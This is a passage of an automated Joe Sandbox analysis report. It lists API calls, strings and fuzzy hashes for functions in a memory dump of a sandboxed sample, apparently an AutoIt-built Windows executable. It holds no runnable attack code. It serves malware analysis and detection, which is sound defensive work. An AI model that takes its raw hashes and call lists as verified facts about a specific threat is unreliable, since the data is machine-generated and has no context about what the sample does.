                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: SendString$_memmove
                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                    • API String ID: 2279737902-1007645807
                                                    • Opcode ID: e2086963674f15a45a83e21b58c08c9842bf4036e7306a46a9e27edcbef996fd
                                                    • Instruction ID: ee823ee2e2c682a2dcc45f3678b52b5538ae463e6352f19bf101553b24c230a7
                                                    • Opcode Fuzzy Hash: e2086963674f15a45a83e21b58c08c9842bf4036e7306a46a9e27edcbef996fd
                                                    • Instruction Fuzzy Hash: 9B119470AA016979D764B7A5CC4ADFF7BBEEF95B00F40046DB402E20D1EEA01D45CAB5
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                    • String ID: 0.0.0.0
                                                    • API String ID: 208665112-3771769585
                                                    • Opcode ID: e52e19d90c5fd909527e7416b545613ba86aa484299183ed27e26536ec2aa3ba
                                                    • Instruction ID: a4503c01ab78132c6b6bfeef6b6814ef9e2e74d25bf0de5d9fc7cf24e2bd68ae
                                                    • Opcode Fuzzy Hash: e52e19d90c5fd909527e7416b545613ba86aa484299183ed27e26536ec2aa3ba
                                                    • Instruction Fuzzy Hash: 27110231948129BBDB20AB20AC0AEDB77BE9F01710F0002BAF40496191EF709AC1CB65
                                                    APIs
                                                    • timeGetTime.WINMM ref: 0066521C
                                                      • Part of subcall function 00620719: timeGetTime.WINMM(?,75C0B400,00610FF9), ref: 0062071D
                                                    • Sleep.KERNEL32(0000000A), ref: 00665248
                                                    • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 0066526C
                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0066528E
                                                    • SetActiveWindow.USER32 ref: 006652AD
                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 006652BB
                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 006652DA
                                                    • Sleep.KERNEL32(000000FA), ref: 006652E5
                                                    • IsWindow.USER32 ref: 006652F1
                                                    • EndDialog.USER32(00000000), ref: 00665302
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                    • String ID: BUTTON
                                                    • API String ID: 1194449130-3405671355
                                                    • Opcode ID: d2aa248d2d4b5120babfdbec897d531faf105a0ac38e862c0567992dee8b5c29
                                                    • Instruction ID: 0e6b11e10021c375d9a89f1022d1be5a667654dd2cde916d0fff9842885c2913
                                                    • Opcode Fuzzy Hash: d2aa248d2d4b5120babfdbec897d531faf105a0ac38e862c0567992dee8b5c29
                                                    • Instruction Fuzzy Hash: C421AC70204704BFE7005F60EC8AE7A3B6BEB55786F503528F003922B1EB619E408B62
                                                    APIs
                                                      • Part of subcall function 00609997: __itow.LIBCMT ref: 006099C2
                                                      • Part of subcall function 00609997: __swprintf.LIBCMT ref: 00609A0C
                                                    • CoInitialize.OLE32(00000000), ref: 0066D855
                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0066D8E8
                                                    • SHGetDesktopFolder.SHELL32(?), ref: 0066D8FC
                                                    • CoCreateInstance.OLE32(00692D7C,00000000,00000001,006BA89C,?), ref: 0066D948
                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0066D9B7
                                                    • CoTaskMemFree.OLE32(?,?), ref: 0066DA0F
                                                    • _memset.LIBCMT ref: 0066DA4C
                                                    • SHBrowseForFolderW.SHELL32(?), ref: 0066DA88
                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0066DAAB
                                                    • CoTaskMemFree.OLE32(00000000), ref: 0066DAB2
                                                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0066DAE9
                                                    • CoUninitialize.OLE32(00000001,00000000), ref: 0066DAEB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                    • String ID:
                                                    • API String ID: 1246142700-0
                                                    • Opcode ID: 494ebfc10c687417101eeeb455888abc66ffb36197ad9dec0b1e5e86ee27312f
                                                    • Instruction ID: a4d9dc7e58f4611d2370ffd0f9419822a1d5b556eff7d96c1d8a3823b745dc5d
                                                    • Opcode Fuzzy Hash: 494ebfc10c687417101eeeb455888abc66ffb36197ad9dec0b1e5e86ee27312f
                                                    • Instruction Fuzzy Hash: B5B1EB75A00109AFDB44DFA4C888DAEBBFAFF48314B1485A9F909EB251DB30ED45CB54
                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 006605A7
                                                    • SetKeyboardState.USER32(?), ref: 00660612
                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00660632
                                                    • GetKeyState.USER32(000000A0), ref: 00660649
                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00660678
                                                    • GetKeyState.USER32(000000A1), ref: 00660689
                                                    • GetAsyncKeyState.USER32(00000011), ref: 006606B5
                                                    • GetKeyState.USER32(00000011), ref: 006606C3
                                                    • GetAsyncKeyState.USER32(00000012), ref: 006606EC
                                                    • GetKeyState.USER32(00000012), ref: 006606FA
                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00660723
                                                    • GetKeyState.USER32(0000005B), ref: 00660731
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: State$Async$Keyboard
                                                    • String ID:
                                                    • API String ID: 541375521-0
                                                    • Opcode ID: 906ed54ac380cc74e122a3982ba94106c5e81db2acd152223ee51bea6e0b8671
                                                    • Instruction ID: 9c141fc6ab4d17dff0519f4cdc8eeab372c55330e418c078a0e470c45ac8e012
                                                    • Opcode Fuzzy Hash: 906ed54ac380cc74e122a3982ba94106c5e81db2acd152223ee51bea6e0b8671
                                                    • Instruction Fuzzy Hash: 5351DB70A0478429FB35DBB0C9547EBBFB69F12380F0845ADD5C25B2C2DA64AB8CCB55
                                                    APIs
                                                    • GetDlgItem.USER32(?,00000001), ref: 0065C746
                                                    • GetWindowRect.USER32(00000000,?), ref: 0065C758
                                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0065C7B6
                                                    • GetDlgItem.USER32(?,00000002), ref: 0065C7C1
                                                    • GetWindowRect.USER32(00000000,?), ref: 0065C7D3
                                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0065C827
                                                    • GetDlgItem.USER32(?,000003E9), ref: 0065C835
                                                    • GetWindowRect.USER32(00000000,?), ref: 0065C846
                                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0065C889
                                                    • GetDlgItem.USER32(?,000003EA), ref: 0065C897
                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0065C8B4
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0065C8C1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                    • String ID:
                                                    • API String ID: 3096461208-0
                                                    • Opcode ID: e0a377d361c8e737065e1584921ed4865d990cd05ad0d00ecf5654e905d262ab
                                                    • Instruction ID: 677fc903212a66fc29953938e63c233e197e14eb3b3bd3300568b9b7111696e4
                                                    • Opcode Fuzzy Hash: e0a377d361c8e737065e1584921ed4865d990cd05ad0d00ecf5654e905d262ab
                                                    • Instruction Fuzzy Hash: 43512171B00205BFDB18CF69DD99AAEBBB6EB88311F14822DF915D7290D7709D44CB50
                                                    APIs
                                                      • Part of subcall function 00601B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00602036,?,00000000,?,?,?,?,006016CB,00000000,?), ref: 00601B9A
                                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 006020D3
                                                    • KillTimer.USER32(-00000001,?,?,?,?,006016CB,00000000,?,?,00601AE2,?,?), ref: 0060216E
                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 0063BEF6
                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006016CB,00000000,?,?,00601AE2,?,?), ref: 0063BF27
                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006016CB,00000000,?,?,00601AE2,?,?), ref: 0063BF3E
                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006016CB,00000000,?,?,00601AE2,?,?), ref: 0063BF5A
                                                    • DeleteObject.GDI32(00000000), ref: 0063BF6C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                    • String ID:
                                                    • API String ID: 641708696-0
                                                    • Opcode ID: 9093a7270c2472e0c39c8a1b7774c218fffb4c010ff4ec4a19a5df2542d2c5d6
                                                    • Instruction ID: 18c12aaada57e004986bf5efd9a5db7d1ac2a404488c3253e0478b6cedb60cd3
                                                    • Opcode Fuzzy Hash: 9093a7270c2472e0c39c8a1b7774c218fffb4c010ff4ec4a19a5df2542d2c5d6
                                                    • Instruction Fuzzy Hash: 9D618830141711EFDB299F14DD58B6AB7F3FF40316F10A92CE64286AA0C771A891DFA5
                                                    APIs
                                                      • Part of subcall function 006025DB: GetWindowLongW.USER32(?,000000EB), ref: 006025EC
                                                    • GetSysColor.USER32(0000000F), ref: 006021D3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ColorLongWindow
                                                    • String ID:
                                                    • API String ID: 259745315-0
                                                    • Opcode ID: 87c09606686db9408abb44987813052b998c456edf36ec4e31fa1e0578e9aa43
                                                    • Instruction ID: 8256ed05c181bcd7ec375be621251731b1eb84ded971c693d6e923a230d598f3
                                                    • Opcode Fuzzy Hash: 87c09606686db9408abb44987813052b998c456edf36ec4e31fa1e0578e9aa43
                                                    • Instruction Fuzzy Hash: 7F41A031040141ABDB295F68DC9CBBA3B67EF46331F144365FDA58A2E6C7318D82DB61
                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?,0068F910), ref: 0066AB76
                                                    • GetDriveTypeW.KERNEL32(00000061,006BA620,00000061), ref: 0066AC40
                                                    • _wcscpy.LIBCMT ref: 0066AC6A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: BuffCharDriveLowerType_wcscpy
                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                    • API String ID: 2820617543-1000479233
                                                    • Opcode ID: c20e58194144e5a65766113830ce01d68666254f94138ade4f1c6564bd463fdb
                                                    • Instruction ID: 8b88c634573b5bde0fd22097b774845915fc54bc5d9860a742b045c5f604c493
                                                    • Opcode Fuzzy Hash: c20e58194144e5a65766113830ce01d68666254f94138ade4f1c6564bd463fdb
                                                    • Instruction Fuzzy Hash: D2519A711483019BC754EF94C891AABB7A7EF85300F54482DF486672E2DB31AD4ACF63
                                                    APIs
                                                      • Part of subcall function 00602612: GetWindowLongW.USER32(?,000000EB), ref: 00602623
                                                      • Part of subcall function 00602344: GetCursorPos.USER32(?), ref: 00602357
                                                      • Part of subcall function 00602344: ScreenToClient.USER32(006C67B0,?), ref: 00602374
                                                      • Part of subcall function 00602344: GetAsyncKeyState.USER32(00000001), ref: 00602399
                                                      • Part of subcall function 00602344: GetAsyncKeyState.USER32(00000002), ref: 006023A7
                                                    • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0068C2E4
                                                    • ImageList_EndDrag.COMCTL32 ref: 0068C2EA
                                                    • ReleaseCapture.USER32 ref: 0068C2F0
                                                    • SetWindowTextW.USER32(?,00000000), ref: 0068C39A
                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0068C3AD
                                                    • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0068C48F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID$prl$prl
                                                    • API String ID: 1924731296-3599107008
                                                    • Opcode ID: dd01052884524d551c3f120e272ab120c11170c8c4fc9c30fd679038099bcfe0
                                                    • Instruction ID: 8b14bf397584e002f977f5a94c8ec32d35e0d63822e9e6f86cfc9f8264ff6edd
                                                    • Opcode Fuzzy Hash: dd01052884524d551c3f120e272ab120c11170c8c4fc9c30fd679038099bcfe0
                                                    • Instruction Fuzzy Hash: 89518B70244305AFDB04EF24C855FAB7BE6EB88310F00462DF5958B2E1DB71A984DB66
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: __i64tow__itow__swprintf
                                                    • String ID: %.15g$0x%p$False$True
                                                    • API String ID: 421087845-2263619337
                                                    • Opcode ID: 261631e03df43f504a026a226d943af96eb0274b500d9252d7538be04b18bff4
                                                    • Instruction ID: c997f16f8b816b7b65051745ec86406e6b661d5c71a5f58ad3a821c6651dd38b
                                                    • Opcode Fuzzy Hash: 261631e03df43f504a026a226d943af96eb0274b500d9252d7538be04b18bff4
                                                    • Instruction Fuzzy Hash: 7B410671A44619AFDB289B38DC42FB773EBEB04300F24446EE549D72C2EA719942CB51
                                                    APIs
                                                    • _memset.LIBCMT ref: 006873D9
                                                    • CreateMenu.USER32 ref: 006873F4
                                                    • SetMenu.USER32(?,00000000), ref: 00687403
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00687490
                                                    • IsMenu.USER32(?), ref: 006874A6
                                                    • CreatePopupMenu.USER32 ref: 006874B0
                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 006874DD
                                                    • DrawMenuBar.USER32 ref: 006874E5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                    • String ID: 0$F
                                                    • API String ID: 176399719-3044882817
                                                    • Opcode ID: 77bd5f2e6df66ece38377401887bf29c2af2e92d9b3890d54a16c08b497f75bd
                                                    • Instruction ID: d0b10c598c38018c6c9bc0a0a2b8aa8f614ccbd93d95d82d6204dfc120b0626a
                                                    • Opcode Fuzzy Hash: 77bd5f2e6df66ece38377401887bf29c2af2e92d9b3890d54a16c08b497f75bd
                                                    • Instruction Fuzzy Hash: 40414774A01205EFDB10EF64D888EEABBF6FF49300F244228F955A7360D770A920CB60
                                                    APIs
                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 006877CD
                                                    • CreateCompatibleDC.GDI32(00000000), ref: 006877D4
                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 006877E7
                                                    • SelectObject.GDI32(00000000,00000000), ref: 006877EF
                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 006877FA
                                                    • DeleteDC.GDI32(00000000), ref: 00687803
                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0068780D
                                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00687821
                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0068782D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                    • String ID: static
                                                    • API String ID: 2559357485-2160076837
                                                    • Opcode ID: 32241689dd721894a972ac35d45317fc07eeada364768c8af4521f13fa384490
                                                    • Instruction ID: 77854d7ce0d30e8b95d7e9ade2317bdafc7308ae453bb0d80eb7e0cf96569c13
                                                    • Opcode Fuzzy Hash: 32241689dd721894a972ac35d45317fc07eeada364768c8af4521f13fa384490
                                                    • Instruction Fuzzy Hash: FD316A72105215BBDF11AFA4DC09FDA3B6AEF49320F211324FA15A61A0D771D861DBA4
                                                    APIs
                                                    • _memset.LIBCMT ref: 0062707B
                                                      • Part of subcall function 00628D68: __getptd_noexit.LIBCMT ref: 00628D68
                                                    • __gmtime64_s.LIBCMT ref: 00627114
                                                    • __gmtime64_s.LIBCMT ref: 0062714A
                                                    • __gmtime64_s.LIBCMT ref: 00627167
                                                    • __allrem.LIBCMT ref: 006271BD
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006271D9
                                                    • __allrem.LIBCMT ref: 006271F0
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0062720E
                                                    • __allrem.LIBCMT ref: 00627225
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00627243
                                                    • __invoke_watson.LIBCMT ref: 006272B4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                    • String ID:
                                                    • API String ID: 384356119-0
                                                    • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                    • Instruction ID: 9e289b8a41b9e45d88d5cc66e348c0a9627c39b5ff359c5cfbf14738108d6f34
                                                    • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                    • Instruction Fuzzy Hash: FF71C7B1A05B37ABD7149E79DC42F9AB3A6AF11320F14422EF514D6381E770EA448FD4
                                                    APIs
                                                    • _memset.LIBCMT ref: 00662A31
                                                    • GetMenuItemInfoW.USER32(006C6890,000000FF,00000000,00000030), ref: 00662A92
                                                    • SetMenuItemInfoW.USER32(006C6890,00000004,00000000,00000030), ref: 00662AC8
                                                    • Sleep.KERNEL32(000001F4), ref: 00662ADA
                                                    • GetMenuItemCount.USER32(?), ref: 00662B1E
                                                    • GetMenuItemID.USER32(?,00000000), ref: 00662B3A
                                                    • GetMenuItemID.USER32(?,-00000001), ref: 00662B64
                                                    • GetMenuItemID.USER32(?,?), ref: 00662BA9
                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00662BEF
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00662C03
                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00662C24
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                    • String ID:
